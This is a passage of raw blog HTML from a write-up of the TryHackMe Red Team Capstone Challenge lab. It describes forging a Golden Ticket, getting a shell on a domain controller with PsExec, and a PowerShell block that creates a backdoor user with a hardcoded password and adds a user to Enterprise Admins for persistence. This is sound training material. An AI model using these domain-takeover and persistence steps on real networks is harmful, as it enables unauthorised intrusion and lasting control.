data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?resize=1024%2C668&#038;ssl=1\" 
alt=\"\" class=\"wp-image-518\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?resize=1024%2C668&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?resize=300%2C196&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?resize=768%2C501&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?w=1106&amp;ssl=1 1106w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We now have all the information we need to forge the Golden Ticket which will be injected in our current session.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911bbc2&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911bbc2\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"293\" 
data-attachment-id=\"519\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207200133\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?fit=1596%2C457&amp;ssl=1\" data-orig-size=\"1596,457\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207200133\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?fit=1024%2C293&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?resize=1024%2C293&#038;ssl=1\" alt=\"\" class=\"wp-image-519\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?resize=1024%2C293&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?resize=300%2C86&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?resize=768%2C220&amp;ssl=1 768w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?resize=1536%2C440&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?w=1596&amp;ssl=1 1596w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The output indicates that we have successfully impersonated the user. 
We can quickly test if our attack worked by trying to list out the shares on the ROOTDC machine.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911c2d9&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911c2d9\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"811\" height=\"465\" data-attachment-id=\"520\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207200451\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200451.png?fit=811%2C465&amp;ssl=1\" data-orig-size=\"811,465\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207200451\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200451.png?fit=811%2C465&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200451.png?resize=811%2C465&#038;ssl=1\" alt=\"\" class=\"wp-image-520\" 
srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200451.png?w=811&amp;ssl=1 811w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200451.png?resize=300%2C172&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200451.png?resize=768%2C440&amp;ssl=1 768w\" sizes=\"auto, (max-width: 811px) 100vw, 811px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Great! It worked! 
We can also get a shell on the ROOTDC using <code>PsExec.exe<\/code>.<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911ca1f&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911ca1f\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"330\" data-attachment-id=\"521\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207201911\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?fit=1333%2C429&amp;ssl=1\" data-orig-size=\"1333,429\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207201911\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?fit=1024%2C330&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?resize=1024%2C330&#038;ssl=1\" alt=\"\" class=\"wp-image-521\" 
srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?resize=1024%2C330&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?resize=300%2C97&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?resize=768%2C247&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?w=1333&amp;ssl=1 1333w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can submit the proof of compromise and get the flag for the ROOTDC machine.<\/p>\n\n\n\n<p>For persistence, we can create a new user and add it to the Enterprise Admins group so that we will have elevated privileges on all the domains. 
We can either use the PowerShell commands below or use the GUI on CORPDC.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#282A36\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"$pwd = convertTo-SecureString Capstone1@ -AsPlainText -Force\n\nNew-ADUser -Name ishsomeroot -AccountPassword $pwd\n\n$User = Get-ADUser -Identity ishsome  -Server &quot;corpdc.corp.thereserve.loc&quot;\n\n$Group = Get-ADGroup -Identity &quot;Enterprise Admins&quot; -Server &quot;rootdc.thereserve.loc&quot;\n\nAdd-ADGroupMember -Identity $Group -Members $User -Server &quot;rootdc.thereserve.loc&quot;\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 
012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki dracula\" style=\"background-color: #282A36\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #BD93F9\">$pwd<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #8BE9FD\">convertTo-SecureString<\/span><span style=\"color: #F8F8F2\"> Capstone1@ <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">AsPlainText <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Force<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #8BE9FD\">New-ADUser<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Name ishsomeroot <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">AccountPassword <\/span><span style=\"color: #BD93F9\">$pwd<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">$User <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #8BE9FD\">Get-ADUser<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Identity ishsome  <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Server <\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">corpdc.corp.thereserve.loc<\/span><span style=\"color: #E9F284\">&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">$Group <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: 
 <\/span><span">
#F8F8F2\"> <\/span><span style=\"color: #8BE9FD\">Get-ADGroup<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Identity <\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">Enterprise Admins<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Server <\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">rootdc.thereserve.loc<\/span><span style=\"color: #E9F284\">&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #8BE9FD\">Add-ADGroupMember<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Identity $Group <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Members $User <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Server <\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">rootdc.thereserve.loc<\/span><span style=\"color: #E9F284\">&quot;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li>We will create a user called <code>ishsome<\/code><\/li>\n\n\n\n<li>Add this user to the <code>Enterprise Admins<\/code> and <code>Remote Desktop Users<\/code> groups<\/li>\n\n\n\n<li>Use RDP to connect to all other machines on the network<\/li>\n<\/ul>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911d104&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911d104\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" 
height=\"555\" data-attachment-id=\"522\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210181157\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?fit=1285%2C696&amp;ssl=1\" data-orig-size=\"1285,696\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210181157\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?fit=1024%2C555&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?resize=1024%2C555&#038;ssl=1\" alt=\"\" class=\"wp-image-522\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?resize=1024%2C555&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?resize=300%2C162&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?resize=768%2C416&amp;ssl=1 768w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?w=1285&amp;ssl=1 1285w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911d5e4&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911d5e4\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"518\" data-attachment-id=\"523\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210181235\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?fit=1339%2C677&amp;ssl=1\" data-orig-size=\"1339,677\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210181235\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?fit=1024%2C518&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?resize=1024%2C518&#038;ssl=1\" alt=\"\" class=\"wp-image-523\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?resize=1024%2C518&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?resize=300%2C152&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?resize=768%2C388&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?w=1339&amp;ssl=1 1339w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911da6e&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911da6e\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"546\" data-attachment-id=\"524\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210181620\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?fit=1317%2C702&amp;ssl=1\" data-orig-size=\"1317,702\" data-comments-opened=\"1\" 